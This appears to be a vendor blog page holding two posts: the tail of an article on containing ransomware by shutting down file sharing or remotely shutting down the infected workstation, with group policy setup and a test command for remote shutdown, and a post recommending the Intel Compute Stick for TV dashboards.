So what’s the better and safer approach to freeze an ongoing Ransomware infection? Shutting down the server service is the most reliable approach – since it doesn’t require the workstation to be reachable and will almost certainly succeed. Remotely shutting down a workstation has minimal impact on operations but may not always succeed. See below for the pros and cons of each approach:

File Sharing Shutdown
Pros: 100% effective
Cons: Potentially larger disruption than necessary, false positive unnecessarily disrupts business

Remote Workstation Shutdown
Pros: Only disables infected user/workstation, even if false positive
Cons: Requires workstation to be reachable

This ends up being one of those “it depends” situations where you will have to decide what’s the best approach based on your environment. I would personally go with the remote workstation shutdown option in large networks where the vast majority of workstations are desktops reachable (and not firewalled) from the file server. In smaller, more distributed networks with a lot of laptops, I would go with the file service shutdown “nuclear” option.

A hybrid approach may also be an option for those opting for the remote workstation shutdown method: trigger a remote workstation shutdown during business hours when IT staff is available on short notice, but configure the file service shutdown after business hours when it’s safer and affects fewer people. All this can be configured in EventSentry by creating two filters which are identical except for the action and the day/time settings.

Prerequisites
It’s important to point out that the EventSentry agent by default runs under the LocalSystem account, a built-in user account which does not have sufficient privileges on a remote host to issue the shutdown command. You can elevate the permissions of the EventSentry agent and work around this limitation in 2 ways:

  1. Change the service account (fast): Changing the service account the EventSentry service uses to a domain account with administrative permissions will allow the agent to remotely shut down a remote host. This will have to be done on every file server which may issue shut down commands (you can use AutoAdministrator to update multiple file servers if necessary).
  2. Give the “Force shutdown from a remote system” user right: It’s not necessary to grant domain-wide admin rights to the EventSentry agent; the key right the agent needs is the “Force shutdown from a remote system” user right. The quickest way to deploy this setting is of course through group policy:

    a) Open the “Group Policy Management Editor”
    b) Edit an existing policy (e.g. “Default Domain Policy”) or create a new group policy
    c) Navigate to “Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\User Rights Assignment”
    d) Double-click the “Force shutdown from a remote system” user right and add both “Administrators” and the computer accounts of the file servers to the list. Alternatively you can also create a group, add the file servers to the group, and add that group to the policy (keep in mind that you will need to restart the file servers if you go with the group method).

    Once the group policy setting has propagated to the workstations, a remote shutdown initiated from the file server(s) should succeed (see the test commands below).

    Change the “Force shutdown from a remote system” user right
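Once everything is in place you can verify from one of the file servers that a remote shutdown actually works – for example against a hypothetical test workstation (and abort it right away so nobody loses any work):

shutdown /s /m \\testpc01 /t 60 /c "Remote shutdown test - will be aborted"
shutdown /a /m \\testpc01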

 

Good luck protecting your network against Ransomware infections, and remember to verify your backups – no protection is 100% effective.

Perfect hardware for a TV-based dashboard

Dashboards are a great way to visualize large amounts of information in a concise manner. In IT we usually display various types of network data from monitoring software, but dashboards are used in all sorts of environments: you can visualize stock data or show a map of all trucks in a fleet with their current positions.

If you work for a large company with a dedicated NOC then you’ll likely have an integrated setup with 4 or more TVs, connected to hardware specialized for dashboards or, at the very least, a powerful PC with multiple PCI cards.

But not everybody has the budget or the need for a NOC like AT&T’s, and one or two TVs can be sufficient for most networks – provided the dashboard is well-designed and customizable of course.

AT&T’s NOC

Most dashboards require a fairly recent web browser (if you are unlucky even Adobe Flash), making some sort of a PC or Mac the preferred hardware to power that dashboard. Most IT departments have a plethora of old PCs sitting around, and it can be tempting to resurrect one of those boxes and give them a new life as a dashboard PC. After all, you’re “just” displaying a web page.

In reality, older hardware can have a hard time keeping up with modern browsers and the frenzy of Javascript operations that come with a busy dashboard. The dashboards often run well for some time (hours or days – depending on the hardware and the dashboard), but ultimately buckle under the load. The result is a dashboard that skips updates or breaks down altogether. Even if you do have a decent PC sitting around, it’s hardly a perfect solution since even small PCs take up a considerable amount of space, and cables can quickly get in the way. And I think we can all agree that the last thing we need more of are cables.

Low-cost integrated devices like the Raspberry Pi are tempting, but not perfect either. They’re not usually designed to be used with graphical interfaces, much less with memory and CPU hungry applications like web browsers displaying dashboards.

After trying everything from Raspberry Pi, old Mac Mini hardware and more, we finally found a solution for under $100 – which has now worked quite well for several months: The 1st generation Intel Compute Stick which you can get from online retailers like Amazon, NewEgg and others.

Intel Compute Stick

Even in its 1st generation (the one we tested) the Intel Compute Stick running Windows 10 Home performed surprisingly well. We’ve been running an EventSentry dashboard (which of course we’re hoping you are running as well) on it since February on Microsoft’s new Edge browser, and we’ve never had an issue.

The Intel Compute Stick features 2 GB of RAM, is powered by a quad-core Intel Atom processor and has about 30 GB of storage, of which more than half is available. This is of course not a machine you’ll want to render videos or play video games on, but in our experience plenty sufficient for a web browser. We were actually pleasantly surprised by how responsive the little device felt overall. Even though you cannot join a domain, you can still install the EventSentry agent on the machine to keep an eye on performance and other system metrics, for example.

But there are of course some caveats, as is to be expected from a computer that costs less than $100 and is not much bigger than a USB memory stick. If you’re using Bluetooth and Wifi then you’ll only need to connect the power cord and the setup is clean. Since the stick also sports a single USB 2.0 port, we used a USB hub along with a USB-based Ethernet adapter to connect it to our LAN as well as connect a keyboard/mouse. USB 2.0 didn’t negatively affect performance in our limited use case scenario.

If you need more powerful hardware, maybe because your dashboards are particularly taxing, then you can purchase a newer and faster model as well. The 2nd generation Intel Compute Sticks start around $149, and the high-end models include as much as 64 GB of disk space and 4 GB of RAM.

My first computer was an 80286 with 1 MB of RAM and a 20 MB hard drive, and it was about as big as two shoe boxes. It’s impressive to see a device this small perform this well. If you have the need to turn a TV into a full-blown desktop, then I’d definitely recommend the Intel Compute Stick(s)!